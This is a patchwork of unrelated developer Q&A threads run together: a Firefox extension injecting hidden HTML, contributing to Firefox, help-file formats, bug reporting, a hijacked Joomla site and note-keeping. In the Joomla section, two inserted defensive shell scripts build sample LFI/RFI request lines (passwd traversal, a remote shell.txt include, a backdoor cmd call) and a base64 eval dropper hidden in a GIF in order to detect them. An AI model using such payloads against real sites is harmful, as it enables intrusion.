I recently installed a Firefox extension and noticed that it was doing something very odd in the background.
I'm a web developer and use Wordpress mainly. One day I was working on a page in WP admin and switched to the Text rather than Visual mode so I could edit some HTML. I noticed a load of junk HTML in there, hidden using display:none.
The class names rang a bell: it was the name of the extension I had installed several weeks previously.
I immediately uninstalled the extension, but of course it was too late. Since it was injecting code right into the text entry boxes in Wordpress, all that junk got saved with my pages. I had to weed through dozens and manually delete this junk, which in some cases had affected the layout.
I contacted the developers, and they gave me some rubbish about it being totally normal, everyone does this sort of thing, it's within the Mozilla dev terms, and that it was a feature, not horrific malware as I was putting forward.
In this case it was just HTML/CSS, but what if they were injecting JS/PHP etc.? They could be causing all kinds of damage.
I just wondered, from a development perspective, what people's thoughts were. Is this legal?
Many thanks in advance
The best course of action is to spread awareness. I would not do it here, but maybe write a detailed article explaining which extension it is, what it does, how, why it's bad, how to get rid of it, and alternatives.
Medium, your own blog, Hacker News and other social outlets will certainly be welcoming of such information. The developers are very well aware of what they are doing, so don't expect them to broadcast it and/or take action.
Also be sure to read their ToS again and see what you agreed to. If something seems suspicious you can talk to a lawyer or probably report them, although this is beyond what I know.
I am a Mozilla Addon reviewer. Please report your findings as an abuse report and/or addon review (it will be read).
I am trying to contribute to open source, particularly Firefox (Mozilla). I have done my installation and set up, but I have a challenge determining where to look in the codebase to find the file where a bug occurs in order to propose a patch. I would greatly appreciate general guidance on how to proceed. This is my first time attempting to contribute to open source with Firefox.
Basically, upon seeing the bug as reported in Bugzilla (a website where Mozilla bugs are reported), I am clueless on how to proceed from there.
welcome to SO!
I know that contributing to such a big codebase can sometimes feel overwhelming, but I can guarantee you that the Firefox devs really appreciate the efforts you are already putting (and will put!) into your contribution. So.. thanks for the help!
General tips
The Firefox codebase is huge, complex and has many moving parts. Downloading and getting Firefox correctly built locally is already a big step forward, and will save you time later. If you haven't done that already, consider doing it!
Read the How To Contribute Code To Firefox documentation page. It gives a good overview of what the code contribution process looks like in Firefox.
Don't feel shy about asking questions! The bug on Bugzilla (or the github ticket) is usually a good place to ask specific questions or general directions on how to fix a bug in Firefox, and folks are generally friendly, inclusive and happy to support you support them!
a. If you don't receive a direct response within a few business days (usually 2-3) from somebody on the bug, chances are the notification got swallowed in the "immense sea of notifications, emails, messages"(tm) that devs receive. See the next section about reaching out.
How to find who to talk to?
Who knows about a specific part of Firefox or any Mozilla product? This could seem like a hard thing to figure out, but there are a few tips.
If the bug report is on Bugzilla, good people to talk to would be the Reporter (if they are a Mozilla contributor) or the Triage Owner.
Mentored bugs are bugs that were triaged by the dev teams and that were designated to introduce folks to the codebase. For these bugs, a "Mentor" is usually shown under "Assignee" in the "People" section of the bug. That's a good person to ask questions!
Mozilla publishes the list of folks who are responsible for components in Firefox. You can find who to talk to based on where the code is/the bug was filed and then consulting this page.
You can send direct request over Bugzilla to individuals, they are called "needinfo requests". After logging into Bugzilla, on the specific page of the bug you need information on, scroll to the bottom. Type your question in the "Add comment" section, tick the "Request information from" checkbox and either pick the role of the person you want to flag from the dropdown, or select "other" and paste an email address there (that you have identified using the previous points). If the person is on bugzilla, the text field will autocomplete and show the relevant person.
If all the above fails, you can rely on synchronous communication and chat with the devs over here in the #developers channel.
How to find what code to change?
If it's not in the bug, ask the reporter or the person responsible for that section of code. For bugs marked as "mentored", ask the assigned Mentor!
If the Bugzilla bug doesn't mention specific files and you want to find out yourself without reaching out, your best ally is Searchfox. You can type some keywords from the bug at the top of the page and wait for the results in the codebase to come in. This is highly effective! If the bug asks for changing CSS files, for example, you could add a file filter like *.css in the top right.
Another pro-tip is looking at what other bugs in that same bugzilla product/component touched. You would find that by clicking on the arrow next to the component, then picking "Recently Fixed Bugs in This Component": it will show a list of fixed bugs, you can pick one or more, then look at the attachments.
Hope this helps!
Back in the old days, Help was not trivial but possible: generate some funky .rtf file with special tags, run it through a compiler, and you got a WinHelp file (.hlp) that actually works really well.
Then, Microsoft decided that WinHelp was not hip and cool anymore and switched to CHM, up to the point they actually axed WinHelp from Vista.
Now, CHM may be nice, but everyone that has tried to open a .chm file on the network will know the nice "Navigation to the webpage was canceled" screen that is caused by security restrictions.
While there are ways to make CHM work off the network, this is hardly a good choice, because when a user presses the Help button he wants help and not to have to make some funky settings.
Bottom Line: I find CHM absolutely unusable. But with WinHelp not being an option anymore either, I wonder what the alternatives are, especially when it comes to integrate with my Application (i.e. for WinHelp and CHM there are functions that allow you to directly jump to a topic)?
PDF has the disadvantage of requiring the Adobe Reader (or one of the more lightweight ones that not many people use). I could live with that seeing as this is kind of standard nowadays, but can you tell it reliably to jump to a given page/anchor?
HTML files seem to be the best choice, you then just have to deal with different browsers (CSS and stuff).
Edit: I am looking to create my own Help Files. As I am a fan of the "No Setup, Just Extract and Run" philosophy, I had that problem many times in the past because many of my users will run it off the network, which causes exactly this problem.
So I am looking for a more robust and future-proof way to provide help to my users without having to code a different help system for each application I make.
CHM is a really nice format, but that Security Stuff makes it unusable, as a Help system is supposed to provide help to the user, not to generate even more problems.
Yep, at some point they want to add behaviour to their help files, which makes it a security issue, and guess what happens: the remedy is often worse than the threat.
Or it's too simple or too complicated and gets replaced by something new without caring for backward compatibility.
If you want it really simple and built for the ages, go for .TXT.
You didn't specify what your apps are coded in so it depends.
If it's a web app, plain HTML would be the best choice; for a help file you don't need special features or JavaScript, so being browser independent should be straightforward. But also for desktop apps HTML, on- or offline, is often used with good results.
PDF is the other general solution, and yes you can jump to specific pages, see this answer. Every PC has (or should have) one client or the other installed, I wouldn't worry about that. I myself never choose Acrobat Reader; faster, simpler and often better solutions are available, my favorite is Sumatra.
I'm sure .NET apps have their own help system (no experience here) and many languages have options to display tooltips, windows or pages with help either by pressing a hotkey (F1) or clicking some control dialog.
I use Firefox for about 90% of my overall browser usage and periodically discover bugs or strangeness in its behaviour; also from time to time I have suggestions for improvement.
So I think that it's useful for the Firefox community to know about potential or actual problems. Is there such a resource to create quick reports (I'm at work, for example, and don't have enough time for advanced conversations)? What is the easiest way to report bugs and suggest some new ideas? Maybe there is some addon for this purpose?
Thanks in advance.
Good question! Depending on the problem you are seeing, there are different strategies for efficiently reporting the issue. Efficiency in this case means the reduction of the time that passes from your report to actually get somebody to take a look at it (and then decide what's next).
Here's a set of ways you can use to get in touch with the community (disclaimer: I'm part of it):
Bugzilla: it's the one-stop place for reporting bugs for Firefox. I know it's a bit cryptic at first, and there are plans to improve the bug reporting workflow. There's a comprehensive article on MDN that explains how to write a good bug report that's actually helpful. Don't get misled by the word "bug": Bugzilla is also used to track the development workflow and discuss enhancements.
webcompat.com: if you're having problems with a particular website that doesn't get rendered properly, you could still write a bug report in Bugzilla. However, the webcompat website (still supported by Mozilla) is more suited for this kind of thing. It also features a downloadable Firefox addon to speed up filing website compatibility issues.
Github: some components (Testpilot, ...) live on Github rather than in the central Mozilla repository. If you're experiencing issues with them, you could file an issue on the github page for the specific project.
irc.mozilla.org: (discontinued) this chat server allows you to get in touch in real-time with the Mozilla community. There are several channels you can hang out in, even using a web-based IRC client. People are usually very willing to help. This is not the best place to report problems, but still a good place to raise awareness about your bug if it doesn't get triaged (i.e. assigned a priority and discussed) within a week or so.
chat.mozilla.org: as of May 2020, this replaced IRC and is the new recommended mechanism for synchronous communications. See the related wiki.
I know that's a lot of info, but it's easier than you think! If you feel like you don't know where to file bugs, just go to Bugzilla. Please do not hesitate to ask if you need more help and.. cheers for willing to report bugs!
Updated May 2020: Added Matrix and marked IRC as discontinued.
So, I've just started working with a new Joomla site, and something we've added has started hijacking various parts of the site and added links to various places we don't want. Unfortunately, I can't give out a link to the live site right now, but I can describe the problems:
In the footer, where it should say "Designed By: " and the name of the place we got our template from, it leaves the "Designed By:" but removes the name of the template author, and instead puts in two links (not giving the hijacker any more hits but here's the text of them), "online album" and "check whois"
When we hover over the site name, the alt text is set to "Forex Trading Home" which is most certainly not what it should be.
Finally, when you hover over the "Home" item in the main menu, a dropdown appears after a short delay, with a link to "cpanel reseller hosting" inside it.
Now, I'd like to get rid of these advertisements, but I've got no idea where they are coming from. If you guys know some commonly-hijacked files I can search in, or good debugging tricks to find them (I've tried FirePHP, but haven't had much success with it), I'd be much obliged. Unfortunately, since a few people have been working on the site simultaneously, we're not really sure what extensions could have caused it (if that is, in fact, the problem) - but all of them seemed OK, and came from the main Joomla extension site.
EDIT:
Here's a list of the modules I know were installed before we noticed the spam problems start happening:
EasyTemplate.
EasyTemplate - MultiPlugin
mod_picasaslideshow
Content - Picasa Album Embedding
Other than that, everything else was installed after the problems started, or was a theme that has since been uninstalled (and hence, I don't know what it is anymore). The theme that's on it now I've looked at thoroughly, but it is a version of this Martial Arts Theme with a lot of modified images (and one change in the PHP from a .gif to a .png).
EDIT EDIT: So, still looking, but seems an older version of picasa2gallery (we had a new version at one point, but uninstalled it) had an LFI vulnerability. Perhaps that was the source. In any case, I think I'll be doing a full wipe, and just start over, really.
So, turns out the correct answer was "none of the above", not that I noticed that until after I erased everything to remove the hack.
Once I restored the theme, and nothing else, I noticed that the "hack" spam links were back, way too fast to even be an automated script.
That's when I discovered that there was a .gif file in the images directory that contained the "bad" PHP code to include the spam links. Ironically, the code they were using to make it was particularly bad, so at least I got a good laugh out of this long ordeal.
Moral of the story: Don't get themes from ThemZa, and if you do, be prepared to dig through them for cruft, if you like the way they look.
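A quick way to find that kind of cruft before restoring a theme, as an added example that is not part of the original thread: the first function lists image files that carry a PHP open tag or a typical obfuscation call, the second lists PHP files whose include/require target ends in an image extension (the pattern described above, where a .gif in the images directory was really the backdoor). The sample tree it builds is constructed for the example; point the functions at a real Joomla root instead.

```sh
#!/bin/sh
# Added example, not code from the original thread: look for PHP hidden inside image
# files and for template PHP that pulls such a file in through include/require.
# The sample tree built below is constructed data so the functions run offline.

# Print image-looking files that contain a PHP open tag or a common obfuscation call.
scan_images_for_php() {
    find "$1" -type f \( -iname '*.gif' -o -iname '*.png' -o -iname '*.jpg' \
                          -o -iname '*.jpeg' -o -iname '*.ico' \) -print0 \
        | xargs -0 grep -lE '<\?php|<\?=|eval\(|base64_decode\(|gzinflate\(|str_rot13\(' 2>/dev/null \
        || true
}

# Print PHP files whose include/require target ends in an image extension.
find_image_includes() {
    grep -rlE '(include|require)(_once)?[[:space:](]+[^;]*\.(gif|png|jpe?g|ico)' \
        --include='*.php' "$1" 2>/dev/null || true
}

# Constructed sample tree: one clean GIF, one "GIF" that is really a dropper,
# one template file that executes it, and one clean template file for contrast.
build_sample() {
    root=$(mktemp -d)
    mkdir -p "$root/images" "$root/templates/theme"
    printf 'GIF89a\001\000\001\000\200\000\000\377\377\377' > "$root/images/logo.gif"
    printf 'GIF89a<?php eval(base64_decode("ZWNobyAnc3BhbSc7")); ?>' > "$root/images/bg.gif"
    printf '<?php include dirname(__FILE__) . "/../../images/bg.gif"; ?>' \
        > "$root/templates/theme/index.php"
    printf '<?php echo "clean"; ?>' > "$root/templates/theme/clean.php"
    echo "$root"
}

if [ "${1:-}" = "--demo" ]; then
    root=$(build_sample)
    echo "== image files carrying PHP =="
    scan_images_for_php "$root"
    echo "== PHP files including image paths =="
    find_image_includes "$root"
    rm -rf "$root"
fi
```

Run it with `--demo` to see both hits on the sample tree. A match on the second function is the stronger signal: web servers will happily serve a PHP-carrying .gif as an image, so the file only becomes a problem once something in the theme includes it, and that include line is what to remove first.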
Your complete Joomla installation seems to have been hacked; follow the guidelines on what you should do now (re-installing and securing).
Check the server access logs. You'll most likely see accesses to a particular component (look for the com_* in the URI) that are excessive, or just out of place.
When this has happened to my sites it has been a particular component that hijackers are searching Google for (i.e. com_virtuemart was the last culprit) and then they attempt their exploit on the component hoping it is a flawed version.
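The log triage the answer above describes, as an added example that is not part of the original answer: tally requests per com_* component, list the client IPs that hit a given component, and pull out request lines with the classic LFI/RFI markers (directory traversal, null bytes, a URL in a parameter, PHP stream wrappers, or a query string aimed at an image file). The log lines are constructed samples in combined log format; the component and IP values in them are made up for the example.

```sh
#!/bin/sh
# Added example, not code from the original thread: triage a combined-format access log
# for a suspected Joomla component break-in. The log lines below are constructed samples.

# "count component" for every com_* seen in the request path (field 7 of the combined format).
component_hits() {
    awk '{ if (match($7, /com_[A-Za-z0-9_]+/)) c[substr($7, RSTART, RLENGTH)]++ }
         END { for (k in c) print c[k], k }' "$1" | sort -rn
}

# "count ip" for the clients that requested the given component.
clients_for_component() {
    awk -v comp="$1" 'index($7, "option=" comp) { c[$1]++ }
                      END { for (k in c) print c[k], k }' "$2" | sort -rn
}

# Request lines carrying traversal, null bytes, remote-include URLs, PHP stream
# wrappers, or a query string sent to an image file (a backdoor hidden in an image).
suspicious_requests() {
    grep -iE '\.\./|%2e%2e|%00|=(https?|ftp)(:|%3a)|php://|\.(gif|png|jpe?g)\?' "$1" || true
}

# Constructed sample log: two ordinary article views, one ordinary gallery view, and
# one client probing a gallery component with LFI/RFI payloads, then calling a backdoor.
write_sample_log() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
203.0.113.5 - - [10/Oct/2010:13:55:36 +0000] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2010:13:55:40 +0000] "GET /index.php?option=com_content&view=article&id=13 HTTP/1.1" 200 4890 "-" "Mozilla/5.0"
192.0.2.44 - - [10/Oct/2010:14:02:11 +0000] "GET /index.php?option=com_picasa2gallery&view=album&id=3 HTTP/1.1" 200 7710 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2010:02:11:01 +0000] "GET /index.php?option=com_picasa2gallery&controller=../../../../etc/passwd%00 HTTP/1.1" 200 2301 "-" "libwww-perl/5.8"
198.51.100.7 - - [10/Oct/2010:02:11:02 +0000] "GET /index.php?option=com_picasa2gallery&controller=../../../../../proc/self/environ%00 HTTP/1.1" 200 2301 "-" "libwww-perl/5.8"
198.51.100.7 - - [10/Oct/2010:02:11:03 +0000] "GET /index.php?option=com_picasa2gallery&controller=http://198.51.100.9/shell.txt? HTTP/1.1" 200 2310 "-" "libwww-perl/5.8"
198.51.100.7 - - [10/Oct/2010:02:11:09 +0000] "GET /images/bg.gif?cmd=id HTTP/1.1" 200 310 "-" "libwww-perl/5.8"
EOF
    echo "$f"
}

if [ "${1:-}" = "--demo" ]; then
    log=$(write_sample_log)
    echo "== hits per component =="
    component_hits "$log"
    echo "== clients for com_picasa2gallery =="
    clients_for_component com_picasa2gallery "$log"
    echo "== suspicious requests =="
    suspicious_requests "$log"
    rm -f "$log"
fi
```

On the sample, the component tally alone already singles out the gallery component, and the client breakdown shows one IP responsible for most of its traffic; the suspicious-request filter then gives the timeline, including the later call to the image-file backdoor. On a real log, run the three against the same file and look at the earliest suspicious line for the component: that is usually the hole, and everything written to disk after that timestamp is suspect.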
If you can't positively identify and fix the hole they broke in through, it's likely the reinstall Tobias P. recommends is the only safe way. If somebody has access to files on that level, you have a big problem. You will need to identify which way they came in. This could have a multitude of reasons:
Somebody exploiting a Joomla security hole (or one in a plug-in)
Somebody having gained access to the FTP account through spying on a client computer
Somebody exploiting a weakness in the server software
This is most likely somebody exploiting a Joomla hole, and there's probably no reason to panic. But you definitely should find out, or do a reinstall. Maybe you'll find more specific help on the Joomla forums or with your ISP.
While you're at it, best change all FTP passwords too, just to make sure.
Good reading at Google: My site's been hacked - now what?
What do the clever programmers here do to keep track of handy programming tricks and useful information they pick up over their many years of experience? Things like useful compiler arguments, IDE short-cuts, clever code snippets, etc.
I sometimes find myself frustrated when looking up something that I used to know a year or two ago. My IE favorites probably represent a good chunk of the Internet in the late 1990s, so clearly that isn't effective (at least for me). Or am I just getting old?
So.. what do you do?
Two Things I do:
I blog about it - this allows me to go back and search my own blog.
We use the code snippet feature in Visual Studio.
Cheers.
I use:
Google Notebook - I take notes for projects, books I'm reading, etc
Delicious + Firefox plug in - Every time I see a good page I mark it.
Windows Journal (on a tablet PC) - When I need to draw something and then copy/cut/paste it. I have more distractions here, the web is always very close :)
Small Moleskine paper notebook - It's always with me.
Big paper notebook - When I need more space to write and less distractions.
Obviously these are for all useful information, not just for snippets or tips and tricks.
Why not set up a Wiki?
If you are on Windows, I know that ScrewTurn wiki is pretty simple to deploy on a desktop/laptop. No database to fuss around with.
Blog about it.
One of the nice side-effects of blogging is that if you use a sensible categorization or tagging system, it's quite easy to search for stuff within your blog. The fact that you wrote about it also makes it easier to remember problems you have encountered before ("hey, I blogged about that!").
That's a great benefit aside from, of course, being able to share this information publicly so that others might be able to find your solution to a particular problem using Google.
A number of people I know swear by Google Notebook
I send them to my gmail account, that way I have them where ever I go, and they can be put into appropriate folders for later.
I second the blog about it technique...even Jeff said that's a major reason he blogs.
Also, regarding the wiki idea, if you set one up at work, be sure to encourage your coworkers to do the same. When someone finds something of interest they can just write a little "article" explaining what it is and how to do it... that way, not only are your own things easily available and quickly searchable, but you'll often find out things you never knew from other people in your group. That way it benefits everyone not just you.
I agree with emailing, the wiki and the blog. Emailing is the most useful. If you can't use GMail and you're on windows, install a desktop search utility (Windows search, Google Desktop, Copernic, etc)
I also like to jot it into a textfile and save it in my documents folder. Whatever desktop search utility you use will be able to find it easily. e.g.
//print spool stop.notes.txt
If the printer spooler stops, start it again by
- Services > Provision Networks > Restart Service
tags: printer provision no printer spooler cannot print remote desktop
Subscribe in Google Reader and then search later.
At my last place of work they wouldn't let me set up a wiki or anything - so I just made various word documents full of tips and instructions and gave that to my successor when I left.
Now though I'd use a private wiki, or maybe a blog.
For many years I've kept a Word doc named Knowledgebase.doc that contains all my notes with a decent table of contents. I like to keep everything in one searchable doc.
I use a sync tool to make sure the file is copied to all the machines I want it on.
I use TiddlyWiki stored in my Dropbox account. Although, recently, Evernote is getting my attention; it has a really useful feature: you send a Twitter direct message to the Evernote user (myen) and it adds a note with your message (a really quick way to add notes or URLs for post-processing). Imagine, you can use a command-line Twitter client to create notes! (or any Twitter client). I really like this feature.